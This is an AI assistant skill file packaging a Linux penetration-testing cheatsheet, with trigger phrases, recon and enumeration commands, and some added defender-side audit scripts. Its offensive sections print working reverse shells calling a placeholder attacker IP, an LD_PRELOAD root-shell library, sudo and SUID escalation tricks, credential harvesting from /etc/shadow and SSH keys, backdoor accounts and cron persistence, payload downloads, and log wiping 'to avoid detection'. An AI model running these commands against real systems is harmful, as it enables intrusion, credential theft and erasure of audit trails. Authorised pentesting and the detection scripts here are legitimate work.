---
name: linux-pentester-commands
description: Practical Linux command reference for penetration testing, reconnaissance, enumeration, exploitation, and privilege escalation
triggers:
  - how do I enumerate services on a Linux system
  - show me Linux commands for privilege escalation
  - what are the best reconnaissance commands for pentesting
  - help me with Linux exploitation techniques
  - how to perform local enumeration on Linux
  - give me pentesting cheatsheet commands
  - what Linux commands should I use during post-exploitation
  - show me how to escalate privileges on Linux
---
Linux Pentester Commands Skill
Skill by ara.so — Security Skills collection.
This skill provides expertise in using the Linux for a Pentester command reference repository, a curated collection of practical Linux commands used in penetration testing workflows including reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
What This Project Does
Linux for a Pentester is a practical command reference organized by penetration testing phases:
- General Commands: Essential Linux survival commands
- Reconnaissance: Local and network information gathering
- Enumeration: Deep service and user data discovery
- Exploitation: Initial access techniques
- Privilege Escalation: Techniques to gain root access
- Post-Exploitation: Persistence and lateral movement
- Cheatsheets: Quick reference one-liners
Installation
Clone the repository to have offline access during engagements:
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
For quick reference during active testing:
# Add as a shell alias for fast access
echo 'alias pentref="cd ~/Linux-for-a-Pentester && ls"' >> ~/.bashrc
source ~/.bashrc
Repository Structure
Linux-for-a-Pentester/
├── 00-General-Commands/ # Basic Linux survival commands
├── 01-Recon/ # Reconnaissance phase commands
├── 02-Enumeration/ # Service and system enumeration
├── 03-Exploitation/ # Exploitation techniques
├── 04-Privilege-Escalation/ # Privilege escalation methods
├── 05-Post-Exploitation/ # Post-exploitation activities
└── Cheatsheets/ # Quick reference sheets
Common Pentesting Workflows
1. Initial Reconnaissance
System Information Gathering:
# Basic system information
uname -a # Kernel version and architecture
cat /etc/os-release # OS version details
hostname # Current hostname
uptime # System uptime
# User context
whoami # Current user
id # User/group IDs and memberships
groups # Group memberships
Network Reconnaissance:
# Network interfaces and connections
ip addr # Network interfaces
ip route # Routing table
ss -tulpn # Active network connections
netstat -antup # Alternative (older systems)
# DNS and hostname resolution
cat /etc/hosts
cat /etc/resolv.conf
2. Enumeration Phase
User Enumeration:
# User and group information
cat /etc/passwd # All users
cat /etc/group # All groups
lastlog # Last login information
w # Currently logged-in users
# Home directories
ls -la /home/
find /home -type f -readable 2>/dev/null
Service Enumeration:
# Running services
systemctl list-units --type=service --state=running
ps aux # All running processes
ps -ef --forest # Process tree view
# Listening services
ss -tulpn | grep LISTEN
lsof -i -P -n # Open network connections
File System Enumeration:
# SUID/SGID files (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null # SUID files
find / -perm -2000 -type f 2>/dev/null # SGID files
find / -perm -6000 -type f 2>/dev/null # Both
# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
# Configuration files
find /etc -type f -readable 2>/dev/null
grep -r "password" /etc/ 2>/dev/null
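The SUID/SGID and writable-directory searches above are one-shot listings; on a host you defend, the useful question is what changed since the last run. The script below is an added example (not part of the Linux-for-a-Pentester repository): it records a baseline of special-permission files, reports new ones with `comm`, and lists world-writable directories that lack the sticky bit (the combination that lets any user replace another user's files). It assumes POSIX sh with find, sort and comm; the demo paths are constructed under mktemp.

```shell
#!/bin/sh
# Added example (not part of the Linux-for-a-Pentester repository): a defender-side
# baseline check for the SUID/SGID and writable-directory findings above.
# Assumes POSIX sh with find, sort and comm; demo paths are constructed under mktemp.

# SUID or SGID regular files below $1, one path per line, sorted for diffing.
list_special_perms() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Paths that are SUID/SGID now but absent from the baseline file $1 (root to scan: $2).
# A new entry is either a package upgrade you can explain or a binary someone planted.
new_special_perms() {
    list_special_perms "$2" | comm -13 "$1" -
}

# World-writable directories without the sticky bit: anyone can replace or delete
# other users' files there, which is what makes a writable cron or PATH directory a finding.
unsticky_world_writable_dirs() {
    find "$1" -type d -perm -0002 ! -perm -1000 -print 2>/dev/null | sort
}

# Constructed demonstration: record a baseline, then add a file and a directory that a
# later scan should flag. Run with: sh this_script.sh --demo
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/shared" "$root/drop"
    : > "$root/bin/helper"; chmod 4755 "$root/bin/helper"      # expected SUID helper
    chmod 1777 "$root/shared"                                   # world-writable but sticky: not flagged
    list_special_perms "$root" > "$root/baseline.txt"
    : > "$root/drop/newbin"; chmod 4755 "$root/drop/newbin"     # appears after the baseline was taken
    chmod 0777 "$root/drop"                                     # writable by everyone, no sticky bit
    echo "new SUID/SGID files:";    new_special_perms "$root/baseline.txt" "$root"
    echo "unsticky writable dirs:"; unsticky_world_writable_dirs "$root"
    rm -rf "$root"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

On a real host, run `list_special_perms /` once at build time, store the output alongside the package manifest, and schedule `new_special_perms` so that a planted binary shows up as a one-line diff instead of being buried in a full listing.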
3. Exploitation Commands
Reverse Shells:
# Bash reverse shell
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
# Netcat reverse shell
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f
# Python reverse shell
# Double quotes so that $ATTACKER_IP is expanded by the shell (inside single quotes it is passed literally)
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
# PHP reverse shell
# \$sock keeps the PHP variable out of shell expansion while $ATTACKER_IP is still expanded
php -r "\$sock=fsockopen('$ATTACKER_IP',4444);exec('/bin/sh -i <&3 >&3 2>&3');"
Shell Upgrade:
# Upgrade to interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Full interactive shell
# In reverse shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background
# On attacker machine:
stty raw -echo; fg
# Press Enter twice
export TERM=xterm
4. Privilege Escalation
SUID Exploitation:
# Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# Common SUID exploits
# GTFOBins patterns for specific binaries
/usr/bin/find . -exec /bin/sh \; -quit
/usr/bin/vim -c ':!/bin/sh'
/usr/bin/nmap --interactive
Sudo Exploitation:
# Check sudo privileges
sudo -l
# Common sudo bypasses
sudo -u#-1 /bin/bash # CVE-2019-14287 (sudo < 1.8.28)
# LD_PRELOAD exploitation (if env_keep+=LD_PRELOAD)
# Create malicious library
cat > /tmp/shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setgid/setuid; without it modern gcc rejects the implicit declarations */
/* _init runs when the library is loaded, before main() of the sudo-allowed program */
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_program>
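Every trick in this section depends on a sudoers misconfiguration or an old sudo build, so the defender's counterpart is an audit of the policy text. The script below is an added example (not part of the Linux-for-a-Pentester repository): `audit_sudoers` reads sudoers-format text (the output of `sudo -l` works too) and prints one line per risky directive, and `sudo_older_than_1_8_28` checks a version string against the fix release for CVE-2019-14287 cited above. It assumes POSIX sh with GNU sed; the sample policy in the test is constructed.

```shell
#!/bin/sh
# Added example (not part of the Linux-for-a-Pentester repository): a defender-side audit
# of sudoers text for the conditions that make the LD_PRELOAD and sudo tricks above work.
# Assumes POSIX sh with GNU sed. Note: the "#include"/"#includedir" directives are treated
# as comments here, so audit /etc/sudoers.d/* files separately.

audit_sudoers() {   # $1 = file with sudoers content (or saved "sudo -l" output)
    # Strip comments and blank lines, then join backslash continuations onto one line.
    sed -e 's/#.*$//' -e '/^[[:space:]]*$/d' "$1" | sed -e ':a' -e '/\\$/N; s/\\\n//; ta' |
    while IFS= read -r line; do
        case "$line" in
            *env_keep*-=*) ;;   # env_keep -= removes variables: safe
            *env_keep*LD_PRELOAD*|*env_keep*LD_LIBRARY_PATH*)
                echo "WARNING: env_keep preserves dynamic-loader variables: $line" ;;
            *'!env_reset'*)
                echo "WARNING: env_reset disabled, caller environment reaches root: $line" ;;
            *setenv*)
                echo "WARNING: setenv lets the caller set arbitrary variables: $line" ;;
            *NOPASSWD:*ALL*)
                echo "WARNING: passwordless sudo for ALL commands: $line" ;;
            *NOPASSWD:*)
                echo "NOTICE: passwordless command, check it against GTFOBins: $line" ;;
        esac
    done
}

# Returns 0 if version $1 (e.g. "1.8.27p2", the third word of "sudo -V | head -1") is below
# 1.8.28. CVE-2019-14287 additionally needs a rule of the form (ALL, !root), so treat a hit
# as "patch sudo", not as proof that the host is exploitable.
sudo_older_than_1_8_28() {
    major=${1%%.*}; rest=${1#*.}; minor=${rest%%.*}
    patch=${rest#*.}; patch=${patch%%[!0-9]*}     # drop a "p2"-style suffix
    if [ "$major" -ne 1 ]; then [ "$major" -lt 1 ]
    elif [ "$minor" -ne 8 ]; then [ "$minor" -lt 8 ]
    else [ "${patch:-0}" -lt 28 ]
    fi
}
```

Typical use is `sudo cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers /dev/stdin` on the host, and `sudo_older_than_1_8_28 "$(sudo -V | awk 'NR==1{print $3}')"` in a configuration check.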
Cron Job Exploitation:
# Enumerate cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
crontab -l -u root 2>/dev/null
# Check for writable cron scripts
find /etc/cron* -type f -writable 2>/dev/null
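The `find /etc/cron* -writable` check above only tests whether the current user can write the files in the cron directories; the scripts a crontab actually runs usually live elsewhere (/opt, /usr/local/bin, a home directory). The function below is an added example (not part of the Linux-for-a-Pentester repository): it parses /etc/crontab-format lines, resolves the program each entry runs, and reports the ones that are group- or world-writable. It assumes POSIX sh with ls and cut, takes a root prefix so it can be tested against a constructed tree, and skips relative program names such as `cd` or `run-parts`.

```shell
#!/bin/sh
# Added example (not part of the Linux-for-a-Pentester repository): report cron entries
# whose program file can be modified by users other than its owner.
# Assumes POSIX sh, ls and cut. $2 is a root prefix ("" on a live host, a temp dir in tests).

writable_cron_targets() {   # $1 = crontab in /etc/crontab format (schedule user command)
    root=$2
    grep -vE '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |      # drop comments, blanks, VAR=value lines
    while IFS= read -r line; do
        set -f; set -- $line; set +f          # split on whitespace; -f keeps "*" from globbing
        case "$1" in
            @*) user=$2; prog=$3 ;;           # @reboot/@daily form: schedule user command
            *)  [ $# -ge 7 ] || continue; user=$6; prog=$7 ;;
        esac
        p="$root$prog"
        [ -f "$p" ] || continue               # relative names (cd, run-parts) or missing files are skipped
        # columns 6 and 9 of "ls -ld" are the group-write and other-write bits
        case "$(ls -ld "$p" | cut -c6,9)" in
            *w*) echo "WRITABLE:$user:$prog" ;;
        esac
    done
}
```

Run it as `writable_cron_targets /etc/crontab ""` and again for each file in /etc/cron.d; a WRITABLE line for a root entry means any member of that group (or anyone, for world-writable) can change what root executes on the next tick.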
Kernel Exploits:
# Check kernel version
uname -a
cat /proc/version
# Search for kernel exploits (use searchsploit or online databases)
# Common kernel exploits:
# - DirtyCow (CVE-2016-5195)
# - DirtyPipe (CVE-2022-0847)
5. Post-Exploitation
Credential Harvesting:
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
# Password files and history
cat /etc/shadow 2>/dev/null
cat ~/.bash_history
find / -name .bash_history 2>/dev/null
# Configuration files with credentials
grep -r "password" /var/www/ 2>/dev/null
grep -r "pass" /opt/ 2>/dev/null
find / -name "*.conf" -exec grep -i "password" {} \; 2>/dev/null
Persistence:
# Add SSH key
mkdir -p ~/.ssh
echo "$PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Add user account
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor
# Cron persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
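The reverse-shell one-liners in section 3 and the persistence commands above all leave textual traces: a process argument list or crontab containing `/dev/tcp/`, `mkfifo` or `pty.spawn`, a second UID-0 account in /etc/passwd, a new member of the sudo group. The script below is an added example (not part of the Linux-for-a-Pentester repository) that scans for exactly those traces. `flag_suspicious_cmdlines` works on any file of command lines (`ps -eo args`, a crontab, a history file) and `audit_accounts` reads passwd- and group-format files, so both run offline against the constructed samples in the test. It assumes POSIX sh with grep -E and awk.

```shell
#!/bin/sh
# Added example (not part of the Linux-for-a-Pentester repository): detection logic for the
# reverse-shell and persistence patterns shown on this page. Assumes POSIX sh, grep -E, awk.

# Print (with line numbers) command lines matching the reverse-shell and shell-upgrade
# patterns from section 3. Feed it "ps -eo args", crontab contents, or a .bash_history.
flag_suspicious_cmdlines() {   # $1 = file of command lines
    grep -nE '/dev/tcp/|mkfifo|(^|[[:space:];|])nc[[:space:]].*-e[[:space:]]|pty\.spawn|bash -i|base64 -d' "$1" || true
}

# Accounts with UID 0 that are not root, plus every member of the admin groups.
# A freshly added user with sudo membership (as in the persistence section) shows up here.
audit_accounts() {   # $1 = passwd-format file, $2 = group-format file
    awk -F: '$3 == 0 && $1 != "root" { print "UID0:" $1 }' "$1"
    awk -F: '($1 == "sudo" || $1 == "wheel" || $1 == "admin") && $4 != "" {
                 n = split($4, m, ","); for (i = 1; i <= n; i++) print "ADMIN:" $1 ":" m[i] }' "$2"
}

# Live-host usage (uncomment on a system you are allowed to inspect):
# ps -eo args > /tmp/args.txt && flag_suspicious_cmdlines /tmp/args.txt
# audit_accounts /etc/passwd /etc/group
```

Compare the ADMIN list against the group membership you provisioned; on a system with no interactive administrators it should be empty, and any UID0 line is a finding by itself.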
Key Command Categories
Network Scanning
# Port scanning (if nmap unavailable, use native tools)
for port in {1..1000}; do timeout 1 bash -c "echo >/dev/tcp/localhost/$port" 2>/dev/null && echo "Port $port open"; done
# ARP scanning
ip neigh
arp -a
File Transfer Techniques
# Python HTTP server (attacker machine)
python3 -m http.server 8000
# Download files (target machine)
wget http://$ATTACKER_IP:8000/file
curl -O http://$ATTACKER_IP:8000/file
# If no wget/curl
exec 3<>/dev/tcp/$ATTACKER_IP/8000
echo -e "GET /file HTTP/1.0\r\n\r\n" >&3
# The response starts with HTTP headers; drop everything up to the first blank line
cat <&3 | sed '1,/^[[:space:]]*$/d' > file
# Base64 transfer (small files)
# On attacker: base64 file | xclip -selection clipboard
# On target: echo "BASE64_STRING" | base64 -d > file
Log Cleanup
# Clear bash history
history -c
rm ~/.bash_history
unset HISTFILE
# Clear system logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
find /var/log -type f -exec truncate -s 0 {} \;
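Each cleanup command above leaves its own trace: `echo "" >` or `truncate -s 0` produces a zero-byte log whose modification time is the moment of the wipe, and `history -c` followed by removing the file leaves an interactive account with no history at all. The script below is an added example (not part of the Linux-for-a-Pentester repository) that looks for both conditions. It assumes POSIX sh with find and awk, and takes a root prefix so the test can run against a constructed tree.

```shell
#!/bin/sh
# Added example (not part of the Linux-for-a-Pentester repository): detect the traces left by
# log truncation and history removal. Assumes POSIX sh with find and awk.

# Zero-byte regular files under the log directory $1. auth.log and syslog are never empty
# on a running host, so an empty one was truncated (check its mtime for when).
find_emptied_logs() {
    find "$1" -type f -size 0 2>/dev/null | sort
}

# Interactive accounts (root and UID >= 1000 with a *sh login shell) whose home directory
# has no .bash_history. $1 = passwd-format file, $2 = root prefix ("" on a live host).
missing_history_files() {
    awk -F: '($3 == 0 || $3 >= 1000) && $7 ~ /sh$/ { print $1 ":" $6 }' "$1" |
    while IFS=: read -r user home; do
        [ -f "$2$home/.bash_history" ] || echo "NOHIST:$user:$home"
    done
}

# Live-host usage (needs root to read other users' homes):
# find_emptied_logs /var/log
# missing_history_files /etc/passwd ""
```

A NOHIST line is only an indicator (a new account or HISTFILE=/dev/null in a profile produce the same result), which is why log forwarding to a remote collector, not local file checks, is the control that actually survives this section's commands.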
Environment Variables
When working with this reference, consider setting these environment variables in your testing environment:
# Set in ~/.bashrc or testing session
export ATTACKER_IP="10.10.14.x" # Your attack machine IP
export TARGET_IP="10.10.10.x" # Target machine IP
export LPORT=4444 # Default listening port
Troubleshooting Common Issues
Command Not Found
Some commands may not be available on minimal systems:
# netstat unavailable → use ss
ss -tulpn
# ifconfig unavailable → use ip
ip addr
# wget unavailable → use curl
curl -O http://example.com/file
# nc without -e flag → use named pipe method
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f
Permission Denied Errors
# Redirect stderr to avoid noise
find / -name "interesting" 2>/dev/null
# Use accessible directories
cd /tmp || cd /dev/shm
Limited Shell Issues
# Spawn TTY
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
/bin/bash -i
Best Practices
- Always redirect errors when searching (2>/dev/null)
- Use /tmp or /dev/shm for temporary files (usually writable)
- Clean up after testing to avoid detection
- Document findings as you discover them
- Test commands in safe environments first
- Keep GTFOBins bookmarked for SUID/sudo exploitation
- Check LinPEAS/LinEnum output systematically
Integration with Testing Workflow
# Typical engagement flow:
# 1. Gain initial access
# 2. Stabilize shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 3. Quick wins check
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
# 4. Deep enumeration
# Run automated scripts or manual enumeration
# 5. Exploit findings
# Based on discovered vectors
# 6. Post-exploitation
# Gather credentials, maintain access
# 7. Cleanup
history -c && rm ~/.bash_history
This skill provides the command reference needed for practical Linux penetration testing. Refer to the repository's individual directories for more detailed notes on each phase.